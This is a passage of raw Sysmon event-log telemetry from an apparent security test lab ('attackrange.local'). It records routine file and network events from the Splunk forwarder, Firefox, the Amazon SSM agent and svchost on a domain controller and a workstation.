Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E42CC2C6E879E94817FDFA0F2E21F2E5,SHA256=BCFD83F4187EEB5F6B949A62AE4EA93F617D0EE8BABE01F7F8F60A4C6D9C78C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108559Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:09.031{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7321D50CF29FEF4CB57B7AD76D43935B,SHA256=05735E9A9CFBB9626D2CB516DF7B4BC357BAE96CF9087D623E9EEFF695BFF454,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084028Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:10.678{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58577E0A733ABE5A97D7308AA50F28BA,SHA256=B50C3AC1C115D4A88F50F0F0A17A60FEF4E16FDB70ED0823E6AF9A70D2FB879F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108560Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:10.061{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1CC4B0049FD512ADF56737C86CED7B5E,SHA256=C304E33B4A26572043BC877909E051B74FCE9FF5495656439A223BAEC9078220,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084029Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:11.678{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8826B26C6A663274A0C0C19D48F0FB21,SHA256=4EB102D953851307691187DD9436696AEA127DDB5AAE11472D36C6892B15E61F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108565Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:11.645{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108564Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:11.645{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108563Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:11.645{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108562Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:11.645{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108561Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:11.076{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6ACE4692108C11BA263B30CB5B93C653,SHA256=DD6E36CB8DCC03A061FE9B280DD7E57E81492475074395ED19CE6EC04E3036EA,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000084031Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:10.628{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50209-false10.0.1.12-8000- 23542300x800000000000000084030Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:12.678{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC631545C26A82F840F42D65AD024DA0,SHA256=562FD885512EED5C724F0496C8106EDE27C73B00EE8B3B5BE4843D2CD1B1119E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000108573Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:10.460{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51975-false10.0.1.12-8000- 23542300x8000000000000000108572Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:12.096{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37008D4E4837CDF440ECA52F5CE5640F,SHA256=0D2B0722210AB525020BBA6DF1254E94E9B3BBD86CC049D281D271A2AAD2ADE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108571Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:12.060{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=0415F2DD83B8C2F4AFD8BB63126AF94E,SHA256=0B3886157CAA03F5525B8AB302CF487F86F3A8BE2A8166483CB1385AECF496F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108570Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:12.060{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=D2EF034D126AA0601625182BBF75BD13,SHA256=297834683D3D48EEAB8C81B02E579E12A77C6D6A64E6AFC665E4436E0210F8FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108569Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:12.060{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=DC306FDEDB45AA82A99A2D022EEA4357,SHA256=06D2C83776525BA2E9C5223DF734928FBF54A2BFA3884299EB2C7EE86E6DB1CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108568Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:12.060{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=3DAB21FE005BB6CAF36E54E3018D9D84,SHA256=88F291B2DF8B45DD67EB2C093472694DDED9DDD7212BA071FE7611C3D56DD7D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108567Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:12.060{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=8A5FD877402514BD14BF0C4DBADE0CE2,SHA256=8F4E202D884678E2A280BF6260CAB0217B2F0CCCA5DD6E152091896C2E56D981,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108566Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:12.060{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=0931C26B7E00DF5DA6C8CB1481E163E4,SHA256=7E9BBF82CF57F14D38DA428466A7E7E55A92B1A14DCCB6CA61B59EC09A9011F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084032Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:13.693{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E94615379670FCEFF44C9C30F5B744B,SHA256=D13A0E4EA7C8979CDF76625D1997ABF6005BD8E530CE22A5B12F3EFAA0BCE9D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108574Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:13.128{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=471A7144CE62BFF9701A2639AE2FA621,SHA256=EC3E3977967CCA9DD7B8EB4250F8E31593693755AE74F287B6EFD6E140C4D237,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084033Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:14.693{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D0BA041C8C5F49D6C8939BF86059606,SHA256=41B219BDF0FF6525BB6072888538208545ABBE557961062B05AF86814CC1144E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108575Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:14.174{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C329AF70AEBC0BCC84A2CCD0B3ED307,SHA256=662035B70D2346A063F5A9913022E7F52EE73B9A84810D994BF3C373F3840BF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084034Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:15.693{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98BAA281D85B92336E28B29FDE2A867D,SHA256=445EA9549B74EB3FFD93E846ADE620D6BE97555FF8735CFCE50977292E5818D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108576Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:15.191{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C404C954682A37239B8B7E9C967E105B,SHA256=FFF3772773079679730C57558EC69235A5AEAE3BE2212EAAD63DD70292CD3CF2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084035Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:16.703{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40F348F99CF2B75E51AFB8C2C6E509BE,SHA256=035F4098BE5536CA7A39B72EE81E37326A71B836A9ED3DB02A0F7E4A5C862AEC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108577Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:16.209{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6651DD69A328404F0B0CC6201E7840B6,SHA256=0FD71E38726CEDE0627D3ECB3D1AF7C847877A9C46A358D654A1B4C155151021,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084036Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:17.705{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9A3EF208062C3494215012C20D5274A,SHA256=B48AE80C9CAE9E4C3BC402D3788EB7A7DB190E48279F44A132630273301D3203,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000108579Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:16.356{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51976-false10.0.1.12-8000- 23542300x8000000000000000108578Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:17.242{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9D76F5F6BFAF2E5EDAB35CA22B08555,SHA256=BAA28A575F75B286754B29BB949152BC134C26C0AC75189AAB0FBD1F3482146C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084039Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:18.707{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=816F600950C1DEFBBC9D7D29D98AD257,SHA256=DDCB1F6AC5207412D7D7CE7D1B47DD9D86701A0FA470EB221754F75E527ABC70,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108580Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:18.273{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=942DCA5308114652FFFAA457F382C83D,SHA256=10698F24AE78B9F45CC954700BAEBC1ABD74AB0CA929684C589317601A05FCBA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084038Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:18.067{2FDD8D40-AC9A-615A-1C00-00000000FD01}1896NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a5ffc3526a1e15c5\channels\health\respondent-20211004072621-037MD5=CD243B6FFA786E96F03F03FFF6EEA1F9,SHA256=BD72F37F00391F7EDFD796CB74D802386D2E764AAC9DEBCA5D4587784D6F99D6,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000084037Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:15.706{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50210-false10.0.1.12-8000- 23542300x800000000000000084042Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:19.722{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02DDA5C82320BFFAB4485C30C996EB27,SHA256=146BF48A7A087D6F9B8197B646164D48196956DDB667B0D982AB18C46659A71B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108581Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:19.290{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C6495CB02482B0E9A50FDEB24D581A6,SHA256=78519976F002B3F9C188EC2D39DFCDC4A273AF5C3CD98465F6DEA36862661592,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084041Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:19.067{2FDD8D40-AC9A-615A-1C00-00000000FD01}1896NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a5ffc3526a1e15c5\channels\health\surveyor-20211004072618-038MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084040Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:19.067{2FDD8D40-AC9A-615A-1200-00000000FD01}996NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=04DEB087D373D21FFD112DC06022B1EB,SHA256=4795428143D188E7AB80156D8419EFBBF0716EF6AD108F6E809218ADEDAC3ECC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084043Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:20.722{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CDE640EF3C560814020D0BB9E7669862,SHA256=39219DA383875488B8DF6C419B1E6A31FE7D4C6E59ACF8D6441EDC911F74D7FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108582Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:20.310{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=901158A82B65C99A5CCEC166AB95D35F,SHA256=DC77555F7B63DEEF3B145D74E3F92C1644B004A80BF00E1FD72911DD98F8CE5D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084044Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:21.722{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F48E5B7335E1953290D560D070AE4FAA,SHA256=0751D7ADAAB245ACACD8AFD059E871D76DE42D89AA36FBA765B07E2CD6A9D686,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108583Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:21.340{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=473A9CAC2C3C7632A9B436BC0B4A3EA0,SHA256=E657375EAD709FB25BA0AF2C44D5B310655DB95E88A5F8B7EC00EAAECA183AF0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084045Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:22.722{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2894058BB7EAAE5D0C08EE084227CB2B,SHA256=6BC53B6FE89C5E0673A666ED35385748B814B577F04187F2FB9519E472F8F0A0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000108585Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:21.434{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51977-false10.0.1.12-8000- 23542300x8000000000000000108584Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:22.371{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B9A42AE4D6EC262C065C9FA62A8F547,SHA256=AF74A28520D0406101F3DFC931FC998C85B0EE4CED766966453FA3B039D686F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084046Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:23.722{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4744D88E86F2DDB92910B2CFE7484531,SHA256=CEBF5035C0FB1E13D9C6EC22C741739AE27242295FA0693855096CBF0E6441B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108586Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:23.408{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6799F8D29DE06F7A5C0A704991DEA700,SHA256=173BA5F21AD757B699A0F514FAABA175FEB1AA48A8B2F0EE4B0CC337B2A18F1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084048Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:24.722{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=014D95C9D965C4BF8657163E65F6B646,SHA256=18B1E8C2231E49DD72F5D384CF7A7CDBEC2BC80C68D854FDE799074625C72703,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108587Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:24.423{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0176688A657C4E50242CB6E45EC2F70,SHA256=09D2EEAC488507FB865EC700D365778ACAD6325DF0D02A3286B6D9DCAF12F999,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000084047Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:21.750{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50211-false10.0.1.12-8000- 23542300x8000000000000000108588Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:25.437{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9ADBA78547D3B0971C41AF503E7A29C,SHA256=2CFA0CA5D81836B1FE8AAF610DFE76F5AD640F7E92326F6DD3EC5C1BEE6DF143,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084049Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 